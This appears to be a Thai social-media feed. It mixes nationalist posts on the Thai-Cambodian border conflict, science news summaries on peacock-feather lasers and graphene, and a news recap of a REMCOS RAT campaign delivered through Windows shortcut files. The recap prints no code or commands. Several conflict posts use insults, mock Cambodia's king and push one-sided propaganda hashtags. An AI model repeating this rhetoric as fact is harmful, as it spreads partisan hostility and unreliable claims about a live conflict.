• อีมาลี ข่าวปลอมใส่ร้ายไทยรายวัน นาทีนี้ต้องส่งอีช่อออกไปจัดการ มีตำแหน่งเจ้าแม่เฟคนิวส์เป็นเดิมพัน
    #คิงส์โพธิ์แดง
    #มาลีเขมร
    อีมาลี ข่าวปลอมใส่ร้ายไทยรายวัน นาทีนี้ต้องส่งอีช่อออกไปจัดการ มีตำแหน่งเจ้าแม่เฟคนิวส์เป็นเดิมพัน #คิงส์โพธิ์แดง #มาลีเขมร
    Like
    1
    0 Comments 0 Shares 33 Views 0 Reviews
  • การปลอมเอกสาร
    การปลอมเอกสาร
    0 Comments 0 Shares 7 Views 0 0 Reviews
  • กัมพูชาทิ้งร่างทหาร บินโดรนล้ำเขตไทย : [THE MESSAGE]
    พล.อ.ณัฐพล นาคพาณิชย์ รมช.กลาโหม เผยถึงการประชุม
    กลาโหม 3 ฝ่าย ได้ชี้แจงเรื่องเชลยศึก หลังกัมพูชาเรียกร้องให้ปล่อยตัว เราควบคุมอย่างดีตามอนุสัญญาเจนีวา ได้ให้คณะกรรมการกาชาดระหว่างประเทศ(ไอซีอาร์ซี) เข้าไปดูเขาก็พอใจ ยังต้องสอบสวนเพื่อบันทึกข้อมูลหลักฐานให้ครบถ้วน
    แจ้ง รมว.กลาโหมกัมพูชา เก็บร่าง ทหารกัมพูชาที่เสียชีวิตจำนวนมากกลับไป ให้สมเกียรติสมศักดิ์ศรีทหาร หากปล่อยไว้นานอาจเกิดโรคระบาด ส่วนที่โฆษกกระทรวงกลาโหมกัมพูชาระบุว่า เห็นโดรนบินลํ้าเข้ามาในกัมพูชา ยืนยันเป็นของกัมพูชาที่บินกลับไป หลังจากบินล้ำเข้ามาในไทย แสดงถึงวุฒิภาวะพูดเองก็เสียเอง ยอมรับ สถานการณ์ขณะนี้เปราะบางจากข่าวปลอม โดยเฉพาะข่าวปลอมที่บอกให้ประชาชนอพยพ ทำให้กัมพูชาคิดว่าไทยเตรียมสู้รบเขาเลยเตรียมบ้าง เราต้องรวมใจเป็นหนึ่ง แค่ข่าวปลอมจากกัมพูชาก็ต้องแก้ปัญหากันทุกวัน มาเจอข่าวปลอมจากไทยอีก ทำให้ฝ่ายความมั่นคงหนักใจมาก
    กัมพูชาทิ้งร่างทหาร บินโดรนล้ำเขตไทย : [THE MESSAGE] พล.อ.ณัฐพล นาคพาณิชย์ รมช.กลาโหม เผยถึงการประชุม กลาโหม 3 ฝ่าย ได้ชี้แจงเรื่องเชลยศึก หลังกัมพูชาเรียกร้องให้ปล่อยตัว เราควบคุมอย่างดีตามอนุสัญญาเจนีวา ได้ให้คณะกรรมการกาชาดระหว่างประเทศ(ไอซีอาร์ซี) เข้าไปดูเขาก็พอใจ ยังต้องสอบสวนเพื่อบันทึกข้อมูลหลักฐานให้ครบถ้วน แจ้ง รมว.กลาโหมกัมพูชา เก็บร่าง ทหารกัมพูชาที่เสียชีวิตจำนวนมากกลับไป ให้สมเกียรติสมศักดิ์ศรีทหาร หากปล่อยไว้นานอาจเกิดโรคระบาด ส่วนที่โฆษกกระทรวงกลาโหมกัมพูชาระบุว่า เห็นโดรนบินลํ้าเข้ามาในกัมพูชา ยืนยันเป็นของกัมพูชาที่บินกลับไป หลังจากบินล้ำเข้ามาในไทย แสดงถึงวุฒิภาวะพูดเองก็เสียเอง ยอมรับ สถานการณ์ขณะนี้เปราะบางจากข่าวปลอม โดยเฉพาะข่าวปลอมที่บอกให้ประชาชนอพยพ ทำให้กัมพูชาคิดว่าไทยเตรียมสู้รบเขาเลยเตรียมบ้าง เราต้องรวมใจเป็นหนึ่ง แค่ข่าวปลอมจากกัมพูชาก็ต้องแก้ปัญหากันทุกวัน มาเจอข่าวปลอมจากไทยอีก ทำให้ฝ่ายความมั่นคงหนักใจมาก
    Like
    Sad
    2
    0 Comments 0 Shares 96 Views 0 0 Reviews
  • EP.67 : การปลอมเอกสารคืออะไร?
    EP.67 : การปลอมเอกสารคืออะไร?
    0 Comments 0 Shares 17 Views 0 Reviews
  • “บิ๊กเล็ก” โต้ “มาลี” ยันโดรนบินเข้าฝั่งกัมพูชาคือโดรนเขมรเองที่บินกลับจากตรวจการณ์ฝั่งไทย ชี้ สถานการณ์เปราะบางเพราะข่าวปลอม เขมรเอาไปขยายความต่อ เช่น ข่าวไทยเตรียมบุก ยอมรับรัฐตอบโต้ช้า เพราะต้องตรวจสอบความถูกต้อง เพื่อไม่เสียเครดิตในสายตาโลก วอนสื่อช่วยโต้กลับทันทีไม่ต้องรอทางการ

    อ่านต่อ..https://news1live.com/detail/9680000073646

    #SondhiX #Sondhitalk #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    “บิ๊กเล็ก” โต้ “มาลี” ยันโดรนบินเข้าฝั่งกัมพูชาคือโดรนเขมรเองที่บินกลับจากตรวจการณ์ฝั่งไทย ชี้ สถานการณ์เปราะบางเพราะข่าวปลอม เขมรเอาไปขยายความต่อ เช่น ข่าวไทยเตรียมบุก ยอมรับรัฐตอบโต้ช้า เพราะต้องตรวจสอบความถูกต้อง เพื่อไม่เสียเครดิตในสายตาโลก วอนสื่อช่วยโต้กลับทันทีไม่ต้องรอทางการ อ่านต่อ..https://news1live.com/detail/9680000073646 #SondhiX #Sondhitalk #คุยทุกเรื่องกับสนธิ #สนธิเล่าเรื่อง #Thaitimes #กัมพูชายิงก่อน #ไทยนี้รักสงบแต่ถึงรบไม่ขลาด #CambodiaOpenedFire
    Like
    2
    0 Comments 1 Shares 124 Views 0 Reviews
  • Hun Sen’s antics leave the world scratching their heads — even Cambodians are like, ‘Huh?’ (4/8/68)
    ชาวโลกงง ฮุนเซนหลอกเขมร ปล่อยเฟคนิวส์เอง คนเขมรยังงงไปหมด

    #TruthFromThailand
    #CambodiaNoCeasefire
    #Hunsenfiredfirst
    #CambodianDeception
    #กัมพูชายิงก่อน
    #เขมรโกหกโลก
    #ฮุนเซนหลอกประชาชน
    #สงครามข่าวปลอม
    #เสียงจากชายแดน
    #Thaitimes #News1 #Shorts
    #FakeNewsCambodia
    #Scambodia
    Hun Sen’s antics leave the world scratching their heads — even Cambodians are like, ‘Huh?’ (4/8/68) ชาวโลกงง ฮุนเซนหลอกเขมร ปล่อยเฟคนิวส์เอง คนเขมรยังงงไปหมด #TruthFromThailand #CambodiaNoCeasefire #Hunsenfiredfirst #CambodianDeception #กัมพูชายิงก่อน #เขมรโกหกโลก #ฮุนเซนหลอกประชาชน #สงครามข่าวปลอม #เสียงจากชายแดน #Thaitimes #News1 #Shorts #FakeNewsCambodia #Scambodia
    0 Comments 0 Shares 43 Views 0 0 Reviews
  • กัมพูชาปั่นเองแก้เอง งั้นกะสัสมึงก็ปลอมด้วยแหละ
    #คิงส์โพธิ์แดง
    #scambodia
    กัมพูชาปั่นเองแก้เอง งั้นกะสัสมึงก็ปลอมด้วยแหละ #คิงส์โพธิ์แดง #scambodia
    Like
    2
    1 Comments 0 Shares 39 Views 0 Reviews
  • ฮุนเซนปล่อยเฟคนิวส์ อ้างไทยจะโจมตีเมื่อคืน — มีแต่ชาวบ้านเขมรที่เชื่อ หนีอลหม่านกลางดึก [4/8/68]
    Hun Sen spreads fake news claiming Thailand would attack last night — only Cambodian villagers believed it, fleeing in chaos at midnight.

    #TruthFromThailand
    #Hunsenfiredfirst
    #CambodiaNoCeasefire
    #CambodianDeception
    #กัมพูชายิงก่อน
    #ข่าวปลอมเขมร
    #ฮุนเซนสร้างภาพ
    #สงครามจิตวิทยา
    #Thaitimes #News1 #Shorts
    #เสียงจากชายแดน
    #ปกป้องแผ่นดินไทย
    ฮุนเซนปล่อยเฟคนิวส์ อ้างไทยจะโจมตีเมื่อคืน — มีแต่ชาวบ้านเขมรที่เชื่อ หนีอลหม่านกลางดึก [4/8/68] Hun Sen spreads fake news claiming Thailand would attack last night — only Cambodian villagers believed it, fleeing in chaos at midnight. #TruthFromThailand #Hunsenfiredfirst #CambodiaNoCeasefire #CambodianDeception #กัมพูชายิงก่อน #ข่าวปลอมเขมร #ฮุนเซนสร้างภาพ #สงครามจิตวิทยา #Thaitimes #News1 #Shorts #เสียงจากชายแดน #ปกป้องแผ่นดินไทย
    0 Comments 0 Shares 43 Views 0 0 Reviews
  • เรื่องเล่าจากข่าว: นกยูงกับเลเซอร์ในขนหาง—เมื่อธรรมชาติสร้างโพรงแสงได้เอง

    ขนนกยูงตัวผู้มีลวดลายตาไก่ที่สวยงาม ซึ่งเกิดจากโครงสร้างระดับนาโน ไม่ใช่เม็ดสี โดยเฉพาะในส่วนที่เรียกว่า “barbules” ซึ่งเป็นเส้นใยเล็ก ๆ ที่มีแท่งเมลานินเคลือบด้วยเคราตินเรียงตัวอย่างแม่นยำ ทำให้เกิดสีรุ้งที่เปลี่ยนไปตามมุมมอง

    ทีมนักวิจัยจากหลายมหาวิทยาลัยในสหรัฐฯ ได้ทดลองหยดสารเรืองแสง rhodamine 6G ลงบนขนนกยูงหลายรอบ แล้วใช้แสงเลเซอร์สีเขียวยิงเข้าไป พบว่าเกิดการเปล่งแสงเลเซอร์ที่มีความถี่คงที่ที่ 574 และ 583 นาโนเมตร ซึ่งเป็นสีเหลือง-ส้ม

    สิ่งที่น่าทึ่งคือ ไม่ว่าจะยิงไปที่ส่วนไหนของตาไก่—ไม่ว่าจะเป็นสีน้ำเงิน เขียว เหลือง หรือน้ำตาล—ก็ได้ผลเหมือนกันหมด แสดงว่าโครงสร้างภายในขนนกยูงมีความเป็นระเบียบและสามารถทำหน้าที่เป็นโพรงเลเซอร์ได้จริง

    ผลการทดลองนี้แตกต่างจาก “random laser” ที่เคยพบในเนื้อเยื่อสัตว์อื่น ๆ ซึ่งมักให้ผลไม่แน่นอน แต่ขนนกยูงให้ผลซ้ำได้ทุกครั้ง และอาจนำไปสู่การสร้างเลเซอร์ชีวภาพที่ปลอดภัยสำหรับใช้ในร่างกาย เช่น การตรวจวินิจฉัยหรือการรักษา

    ขนนกยูงสามารถเปล่งแสงเลเซอร์ได้เมื่อเติมสารเรืองแสงและยิงแสงเลเซอร์เข้าไป
    ใช้สาร rhodamine 6G และแสงเลเซอร์สีเขียว 532 นาโนเมตร
    เกิดแสงเลเซอร์ที่ 574 และ 583 นาโนเมตร

    โครงสร้างภายในขนนกยูงทำหน้าที่เป็นโพรงเลเซอร์ได้โดยธรรมชาติ
    barbules มีโครงสร้างนาโนที่เรียงตัวอย่างแม่นยำ
    ทำหน้าที่คล้าย photonic crystals ที่สะท้อนและขยายแสง

    ผลการทดลองให้ผลซ้ำได้ทุกครั้ง ไม่ใช่แบบสุ่ม
    แตกต่างจาก random laser ที่พบในเนื้อเยื่ออื่น
    แสดงถึงความเป็นระเบียบในโครงสร้างชีวภาพ

    เป็นครั้งแรกที่พบโพรงเลเซอร์ในเนื้อเยื่อของสัตว์
    อาจนำไปสู่การสร้างเลเซอร์ชีวภาพที่ปลอดภัย
    ใช้ในการตรวจวินิจฉัยภายในร่างกายมนุษย์

    การทดลองใช้ขนนกยูงธรรมชาติที่ไม่มีสารเจือปน
    ตัดเฉพาะส่วนตาไก่และทำความสะอาดก่อนทดลอง
    ทำให้ผลการทดลองมีความแม่นยำและน่าเชื่อถือ

    สีของขนนกยูงเกิดจากโครงสร้าง ไม่ใช่เม็ดสี
    เป็นตัวอย่างของ “structural color” ที่เกิดจากการหักเหของแสง
    คล้ายกับสีในปีกผีเสื้อหรือเกล็ดของแมลงบางชนิด

    photonic crystals ในธรรมชาติสามารถนำไปพัฒนาเทคโนโลยีใหม่
    เช่น หน้าต่างเปลี่ยนสี, ผิววัสดุที่ทำความสะอาดตัวเอง, หรือสิ่งทอกันน้ำ
    อาจใช้ในธนบัตรเพื่อป้องกันการปลอมแปลง

    การศึกษาโครงสร้างชีวภาพระดับนาโนช่วยให้เข้าใจธรรมชาติและสร้างวัสดุใหม่
    เป็นแนวทางของ “biophotonics” และ “bio-inspired engineering”
    อาจนำไปสู่การออกแบบเลเซอร์ที่ปลอดภัยและเข้ากันได้กับร่างกายมนุษย์

    https://www.techspot.com/news/108915-scientists-transform-peacock-feathers-tiny-biological-laser-beams.html
    🎙️ เรื่องเล่าจากข่าว: นกยูงกับเลเซอร์ในขนหาง—เมื่อธรรมชาติสร้างโพรงแสงได้เอง ขนนกยูงตัวผู้มีลวดลายตาไก่ที่สวยงาม ซึ่งเกิดจากโครงสร้างระดับนาโน ไม่ใช่เม็ดสี โดยเฉพาะในส่วนที่เรียกว่า “barbules” ซึ่งเป็นเส้นใยเล็ก ๆ ที่มีแท่งเมลานินเคลือบด้วยเคราตินเรียงตัวอย่างแม่นยำ ทำให้เกิดสีรุ้งที่เปลี่ยนไปตามมุมมอง ทีมนักวิจัยจากหลายมหาวิทยาลัยในสหรัฐฯ ได้ทดลองหยดสารเรืองแสง rhodamine 6G ลงบนขนนกยูงหลายรอบ แล้วใช้แสงเลเซอร์สีเขียวยิงเข้าไป พบว่าเกิดการเปล่งแสงเลเซอร์ที่มีความถี่คงที่ที่ 574 และ 583 นาโนเมตร ซึ่งเป็นสีเหลือง-ส้ม สิ่งที่น่าทึ่งคือ ไม่ว่าจะยิงไปที่ส่วนไหนของตาไก่—ไม่ว่าจะเป็นสีน้ำเงิน เขียว เหลือง หรือน้ำตาล—ก็ได้ผลเหมือนกันหมด แสดงว่าโครงสร้างภายในขนนกยูงมีความเป็นระเบียบและสามารถทำหน้าที่เป็นโพรงเลเซอร์ได้จริง ผลการทดลองนี้แตกต่างจาก “random laser” ที่เคยพบในเนื้อเยื่อสัตว์อื่น ๆ ซึ่งมักให้ผลไม่แน่นอน แต่ขนนกยูงให้ผลซ้ำได้ทุกครั้ง และอาจนำไปสู่การสร้างเลเซอร์ชีวภาพที่ปลอดภัยสำหรับใช้ในร่างกาย เช่น การตรวจวินิจฉัยหรือการรักษา ✅ ขนนกยูงสามารถเปล่งแสงเลเซอร์ได้เมื่อเติมสารเรืองแสงและยิงแสงเลเซอร์เข้าไป ➡️ ใช้สาร rhodamine 6G และแสงเลเซอร์สีเขียว 532 นาโนเมตร ➡️ เกิดแสงเลเซอร์ที่ 574 และ 583 นาโนเมตร ✅ โครงสร้างภายในขนนกยูงทำหน้าที่เป็นโพรงเลเซอร์ได้โดยธรรมชาติ ➡️ barbules มีโครงสร้างนาโนที่เรียงตัวอย่างแม่นยำ ➡️ ทำหน้าที่คล้าย photonic crystals ที่สะท้อนและขยายแสง ✅ ผลการทดลองให้ผลซ้ำได้ทุกครั้ง ไม่ใช่แบบสุ่ม ➡️ แตกต่างจาก random laser ที่พบในเนื้อเยื่ออื่น ➡️ แสดงถึงความเป็นระเบียบในโครงสร้างชีวภาพ ✅ เป็นครั้งแรกที่พบโพรงเลเซอร์ในเนื้อเยื่อของสัตว์ ➡️ อาจนำไปสู่การสร้างเลเซอร์ชีวภาพที่ปลอดภัย ➡️ ใช้ในการตรวจวินิจฉัยภายในร่างกายมนุษย์ ✅ การทดลองใช้ขนนกยูงธรรมชาติที่ไม่มีสารเจือปน ➡️ ตัดเฉพาะส่วนตาไก่และทำความสะอาดก่อนทดลอง ➡️ ทำให้ผลการทดลองมีความแม่นยำและน่าเชื่อถือ ✅ สีของขนนกยูงเกิดจากโครงสร้าง ไม่ใช่เม็ดสี ➡️ เป็นตัวอย่างของ “structural color” ที่เกิดจากการหักเหของแสง ➡️ คล้ายกับสีในปีกผีเสื้อหรือเกล็ดของแมลงบางชนิด ✅ photonic crystals ในธรรมชาติสามารถนำไปพัฒนาเทคโนโลยีใหม่ ➡️ เช่น หน้าต่างเปลี่ยนสี, ผิววัสดุที่ทำความสะอาดตัวเอง, หรือสิ่งทอกันน้ำ ➡️ อาจใช้ในธนบัตรเพื่อป้องกันการปลอมแปลง ✅ การศึกษาโครงสร้างชีวภาพระดับนาโนช่วยให้เข้าใจธรรมชาติและสร้างวัสดุใหม่ ➡️ เป็นแนวทางของ “biophotonics” และ “bio-inspired engineering” ➡️ อาจนำไปสู่การออกแบบเลเซอร์ที่ปลอดภัยและเข้ากันได้กับร่างกายมนุษย์ https://www.techspot.com/news/108915-scientists-transform-peacock-feathers-tiny-biological-laser-beams.html
    WWW.TECHSPOT.COM
    Scientists transform peacock feathers into tiny biological laser beams
    The research, conducted by researchers from several US universities and published in Nature, set out to explore the behavior of peacock feather barbules – microscopic structures that...
    0 Comments 0 Shares 37 Views 0 Reviews
  • เรื่องเล่าจากข่าว: กราฟีนที่เคยแข็งแกร่ง กลับยืดหยุ่นได้ด้วยลอนคลื่นระดับอะตอม

    นักฟิสิกส์จากมหาวิทยาลัย Vienna และ Vienna University of Technology ได้ค้นพบวิธีทำให้กราฟีน—วัสดุที่บางเพียงหนึ่งอะตอมและแข็งแกร่งที่สุด—สามารถยืดหยุ่นได้มากขึ้น โดยใช้เทคนิคการสร้าง “ข้อบกพร่อง” (defects) ด้วยการยิงไอออนอาร์กอนพลังงานต่ำเข้าไปในโครงสร้างอะตอมของกราฟีน ทำให้เกิด “vacancies” หรือช่องว่างจากอะตอมที่หายไป

    ผลลัพธ์คือเกิดลอนคลื่นคล้ายหีบเพลงในโครงสร้างของกราฟีน ซึ่งช่วยให้วัสดุสามารถยืดออกได้ง่ายขึ้นมาก โดยไม่ต้องใช้แรงมากเหมือนการยืดวัสดุเรียบ ๆ แบบเดิม

    การทดลองนี้เกิดขึ้นในสภาพแวดล้อมที่สะอาดไร้ฝุ่นและอากาศ เพื่อให้มั่นใจว่าไม่มีสิ่งแปลกปลอมมารบกวนพื้นผิวของกราฟีน ซึ่งเป็นสิ่งสำคัญมาก เพราะหากมีสิ่งสกปรกอยู่บนพื้นผิว จะทำให้กราฟีนกลับมาแข็งขึ้นแทนที่จะอ่อนลง

    กราฟีนถูกทำให้ยืดหยุ่นขึ้นด้วยการสร้างลอนคลื่นคล้ายหีบเพลง (accordion effect)
    ใช้การยิงไอออนอาร์กอนพลังงานต่ำเพื่อสร้างช่องว่างอะตอม
    ลอนคลื่นช่วยลดแรงที่ต้องใช้ในการยืดวัสดุ

    การทดลองเกิดขึ้นในสภาพแวดล้อมที่สะอาดไร้ฝุ่นและอากาศ
    ป้องกันไม่ให้สิ่งแปลกปลอมรบกวนพื้นผิวกราฟีน
    ทำให้ผลการทดลองแม่นยำและเสถียร

    ค่าความยืดหยุ่นของกราฟีนลดลงจาก 286 N/m เหลือ 158 N/m หลังสร้าง defects
    เป็นการเปลี่ยนแปลงที่มากกว่าที่ทฤษฎีเคยคาดไว้
    อธิบายความขัดแย้งในผลการทดลองก่อนหน้านี้

    การสร้าง defects แบบควบคุมได้ช่วยให้วัสดุมีคุณสมบัติใหม่
    เปิดทางสู่การใช้งานในอุปกรณ์อิเล็กทรอนิกส์แบบยืดหยุ่น
    เหมาะกับเทคโนโลยีสวมใส่และอุปกรณ์พับได้

    การจำลองด้วยคอมพิวเตอร์ยืนยันว่า defects แบบหลายอะตอมมีผลมากกว่าการลบอะตอมเดี่ยว
    ลอนคลื่นเกิดจากแรงดึงรอบจุดที่มีหลายอะตอมหายไป
    การลบอะตอมเดี่ยวไม่ส่งผลต่อความยืดหยุ่นมากนัก

    https://www.neowin.net/news/the-miracle-material-has-been-bent-like-never-before/
    🎙️ เรื่องเล่าจากข่าว: กราฟีนที่เคยแข็งแกร่ง กลับยืดหยุ่นได้ด้วยลอนคลื่นระดับอะตอม นักฟิสิกส์จากมหาวิทยาลัย Vienna และ Vienna University of Technology ได้ค้นพบวิธีทำให้กราฟีน—วัสดุที่บางเพียงหนึ่งอะตอมและแข็งแกร่งที่สุด—สามารถยืดหยุ่นได้มากขึ้น โดยใช้เทคนิคการสร้าง “ข้อบกพร่อง” (defects) ด้วยการยิงไอออนอาร์กอนพลังงานต่ำเข้าไปในโครงสร้างอะตอมของกราฟีน ทำให้เกิด “vacancies” หรือช่องว่างจากอะตอมที่หายไป ผลลัพธ์คือเกิดลอนคลื่นคล้ายหีบเพลงในโครงสร้างของกราฟีน ซึ่งช่วยให้วัสดุสามารถยืดออกได้ง่ายขึ้นมาก โดยไม่ต้องใช้แรงมากเหมือนการยืดวัสดุเรียบ ๆ แบบเดิม การทดลองนี้เกิดขึ้นในสภาพแวดล้อมที่สะอาดไร้ฝุ่นและอากาศ เพื่อให้มั่นใจว่าไม่มีสิ่งแปลกปลอมมารบกวนพื้นผิวของกราฟีน ซึ่งเป็นสิ่งสำคัญมาก เพราะหากมีสิ่งสกปรกอยู่บนพื้นผิว จะทำให้กราฟีนกลับมาแข็งขึ้นแทนที่จะอ่อนลง ✅ กราฟีนถูกทำให้ยืดหยุ่นขึ้นด้วยการสร้างลอนคลื่นคล้ายหีบเพลง (accordion effect) ➡️ ใช้การยิงไอออนอาร์กอนพลังงานต่ำเพื่อสร้างช่องว่างอะตอม ➡️ ลอนคลื่นช่วยลดแรงที่ต้องใช้ในการยืดวัสดุ ✅ การทดลองเกิดขึ้นในสภาพแวดล้อมที่สะอาดไร้ฝุ่นและอากาศ ➡️ ป้องกันไม่ให้สิ่งแปลกปลอมรบกวนพื้นผิวกราฟีน ➡️ ทำให้ผลการทดลองแม่นยำและเสถียร ✅ ค่าความยืดหยุ่นของกราฟีนลดลงจาก 286 N/m เหลือ 158 N/m หลังสร้าง defects ➡️ เป็นการเปลี่ยนแปลงที่มากกว่าที่ทฤษฎีเคยคาดไว้ ➡️ อธิบายความขัดแย้งในผลการทดลองก่อนหน้านี้ ✅ การสร้าง defects แบบควบคุมได้ช่วยให้วัสดุมีคุณสมบัติใหม่ ➡️ เปิดทางสู่การใช้งานในอุปกรณ์อิเล็กทรอนิกส์แบบยืดหยุ่น ➡️ เหมาะกับเทคโนโลยีสวมใส่และอุปกรณ์พับได้ ✅ การจำลองด้วยคอมพิวเตอร์ยืนยันว่า defects แบบหลายอะตอมมีผลมากกว่าการลบอะตอมเดี่ยว ➡️ ลอนคลื่นเกิดจากแรงดึงรอบจุดที่มีหลายอะตอมหายไป ➡️ การลบอะตอมเดี่ยวไม่ส่งผลต่อความยืดหยุ่นมากนัก https://www.neowin.net/news/the-miracle-material-has-been-bent-like-never-before/
    WWW.NEOWIN.NET
    The "miracle material" has been bent like never before
    Physicists discover a counterintuitive method that makes "miracle material" dramatically more stretchable, challenging long-held assumptions about its mechanical limits.
    0 Comments 0 Shares 27 Views 0 Reviews
  • เรื่องเล่าจากข่าว: เมื่อไฟล์ลัดกลายเป็นประตูหลัง—REMCOS RAT แฝงตัวผ่าน LNK และ PowerShell โดยไม่ทิ้งร่องรอย

    ทีมวิจัย Lat61 จากบริษัท Point Wild ได้เปิดเผยแคมเปญมัลแวร์หลายขั้นตอนที่ใช้ไฟล์ลัด Windows (.lnk) เป็นตัวเปิดทางให้ REMCOS RAT เข้าสู่ระบบของเหยื่อ โดยเริ่มจากไฟล์ที่ดูเหมือนไม่มีพิษภัย เช่น “ORDINE-DI-ACQUIST-7263535.lnk” ซึ่งเมื่อคลิกแล้วจะรันคำสั่ง PowerShell แบบลับ ๆ เพื่อดาวน์โหลด payload ที่ถูกเข้ารหัสแบบ Base64 จากเซิร์ฟเวอร์ภายนอก

    หลังจากถอดรหัสแล้ว payload จะถูกเปิดใช้งานในรูปแบบไฟล์ .PIF ที่ปลอมเป็น CHROME.PIF เพื่อหลอกว่าเป็นโปรแกรมจริง ก่อนจะติดตั้ง REMCOS RAT ซึ่งสามารถควบคุมคอมพิวเตอร์ได้เต็มรูปแบบ—ตั้งแต่ keylogging, เปิดกล้อง, ไปจนถึงการสร้าง shell ระยะไกล

    แคมเปญนี้ยังใช้เทคนิคหลบเลี่ยงการตรวจจับ เช่น ไม่ใช้ไฟล์บนดิสก์, ไม่ใช้ macro, และไม่แสดงคำเตือนใด ๆ ทำให้ผู้ใช้ทั่วไปแทบไม่รู้ตัวว่าโดนโจมตี

    แคมเปญมัลแวร์ใหม่ใช้ไฟล์ลัด Windows (.lnk) เป็นช่องทางติดตั้ง REMCOS RAT
    ไฟล์ลัดปลอมเป็นเอกสารหรือโปรแกรม เช่น “ORDINE-DI-ACQUIST…”
    เมื่อคลิกจะรัน PowerShell แบบลับ ๆ

    PowerShell ถูกใช้เพื่อดาวน์โหลด payload ที่ถูกเข้ารหัสแบบ Base64 จากเซิร์ฟเวอร์ภายนอก
    ไม่ใช้ไฟล์บนดิสก์หรือ macro ทำให้หลบการตรวจจับได้
    payload ถูกเปิดใช้งานในรูปแบบไฟล์ .PIF ปลอมชื่อเป็น CHROME.PIF

    REMCOS RAT ให้ผู้โจมตีควบคุมระบบได้เต็มรูปแบบ
    keylogging, เปิดกล้อง, สร้าง shell ระยะไกล, เข้าถึงไฟล์
    สร้าง log file ใน %ProgramData% เพื่อเก็บข้อมูลการกดแป้นพิมพ์

    เซิร์ฟเวอร์ควบคุม (C2) ของแคมเปญนี้อยู่ในสหรัฐฯ และโรมาเนีย
    แสดงให้เห็นว่าการโจมตีสามารถมาจากหลายประเทศ
    ใช้โครงสร้างแบบกระจายเพื่อหลบการติดตาม

    ไฟล์ลัดไม่แสดงคำเตือน macro และสามารถหลอกผู้ใช้ได้ง่าย
    Windows ซ่อนนามสกุลไฟล์โดยค่าเริ่มต้น
    ไฟล์ .lnk อาจดูเหมือน .pdf หรือ .docx.

    ไฟล์ลัด (.lnk) สามารถรันคำสั่งอันตรายได้โดยไม่ต้องใช้ macro หรือไฟล์ .exe
    ผู้ใช้มักเข้าใจผิดว่าเป็นไฟล์เอกสาร
    ไม่มีการแจ้งเตือนจากระบบความปลอดภัยของ Office

    REMCOS RAT สามารถทำงานแบบ fileless โดยไม่ทิ้งร่องรอยบนดิสก์
    ยากต่อการตรวจจับด้วย antivirus แบบดั้งเดิม
    ต้องใช้ระบบป้องกันแบบ real-time และ behavioral analysis

    การปลอมชื่อไฟล์และไอคอนทำให้ผู้ใช้หลงเชื่อว่าเป็นไฟล์จริง
    Windows ซ่อนนามสกุลไฟล์โดยค่าเริ่มต้น
    ไฟล์ .lnk อาจดูเหมือน “Invoice.pdf” ทั้งที่เป็น shortcut

    การเปิดไฟล์จากอีเมลหรือเครือข่ายที่ไม่ปลอดภัยอาจนำไปสู่การติดมัลแวร์ทันที
    ไม่ควรเปิดไฟล์แนบจากผู้ส่งที่ไม่รู้จัก
    ควรใช้ sandbox หรือระบบแยกเพื่อทดสอบไฟล์ก่อนเปิด

    https://hackread.com/attack-windows-shortcut-files-install-remcos-backdoor/
    🎙️ เรื่องเล่าจากข่าว: เมื่อไฟล์ลัดกลายเป็นประตูหลัง—REMCOS RAT แฝงตัวผ่าน LNK และ PowerShell โดยไม่ทิ้งร่องรอย ทีมวิจัย Lat61 จากบริษัท Point Wild ได้เปิดเผยแคมเปญมัลแวร์หลายขั้นตอนที่ใช้ไฟล์ลัด Windows (.lnk) เป็นตัวเปิดทางให้ REMCOS RAT เข้าสู่ระบบของเหยื่อ โดยเริ่มจากไฟล์ที่ดูเหมือนไม่มีพิษภัย เช่น “ORDINE-DI-ACQUIST-7263535.lnk” ซึ่งเมื่อคลิกแล้วจะรันคำสั่ง PowerShell แบบลับ ๆ เพื่อดาวน์โหลด payload ที่ถูกเข้ารหัสแบบ Base64 จากเซิร์ฟเวอร์ภายนอก หลังจากถอดรหัสแล้ว payload จะถูกเปิดใช้งานในรูปแบบไฟล์ .PIF ที่ปลอมเป็น CHROME.PIF เพื่อหลอกว่าเป็นโปรแกรมจริง ก่อนจะติดตั้ง REMCOS RAT ซึ่งสามารถควบคุมคอมพิวเตอร์ได้เต็มรูปแบบ—ตั้งแต่ keylogging, เปิดกล้อง, ไปจนถึงการสร้าง shell ระยะไกล แคมเปญนี้ยังใช้เทคนิคหลบเลี่ยงการตรวจจับ เช่น ไม่ใช้ไฟล์บนดิสก์, ไม่ใช้ macro, และไม่แสดงคำเตือนใด ๆ ทำให้ผู้ใช้ทั่วไปแทบไม่รู้ตัวว่าโดนโจมตี ✅ แคมเปญมัลแวร์ใหม่ใช้ไฟล์ลัด Windows (.lnk) เป็นช่องทางติดตั้ง REMCOS RAT ➡️ ไฟล์ลัดปลอมเป็นเอกสารหรือโปรแกรม เช่น “ORDINE-DI-ACQUIST…” ➡️ เมื่อคลิกจะรัน PowerShell แบบลับ ๆ ✅ PowerShell ถูกใช้เพื่อดาวน์โหลด payload ที่ถูกเข้ารหัสแบบ Base64 จากเซิร์ฟเวอร์ภายนอก ➡️ ไม่ใช้ไฟล์บนดิสก์หรือ macro ทำให้หลบการตรวจจับได้ ➡️ payload ถูกเปิดใช้งานในรูปแบบไฟล์ .PIF ปลอมชื่อเป็น CHROME.PIF ✅ REMCOS RAT ให้ผู้โจมตีควบคุมระบบได้เต็มรูปแบบ ➡️ keylogging, เปิดกล้อง, สร้าง shell ระยะไกล, เข้าถึงไฟล์ ➡️ สร้าง log file ใน %ProgramData% เพื่อเก็บข้อมูลการกดแป้นพิมพ์ ✅ เซิร์ฟเวอร์ควบคุม (C2) ของแคมเปญนี้อยู่ในสหรัฐฯ และโรมาเนีย ➡️ แสดงให้เห็นว่าการโจมตีสามารถมาจากหลายประเทศ ➡️ ใช้โครงสร้างแบบกระจายเพื่อหลบการติดตาม ✅ ไฟล์ลัดไม่แสดงคำเตือน macro และสามารถหลอกผู้ใช้ได้ง่าย ➡️ Windows ซ่อนนามสกุลไฟล์โดยค่าเริ่มต้น ➡️ ไฟล์ .lnk อาจดูเหมือน .pdf หรือ .docx. ‼️ ไฟล์ลัด (.lnk) สามารถรันคำสั่งอันตรายได้โดยไม่ต้องใช้ macro หรือไฟล์ .exe ⛔ ผู้ใช้มักเข้าใจผิดว่าเป็นไฟล์เอกสาร ⛔ ไม่มีการแจ้งเตือนจากระบบความปลอดภัยของ Office ‼️ REMCOS RAT 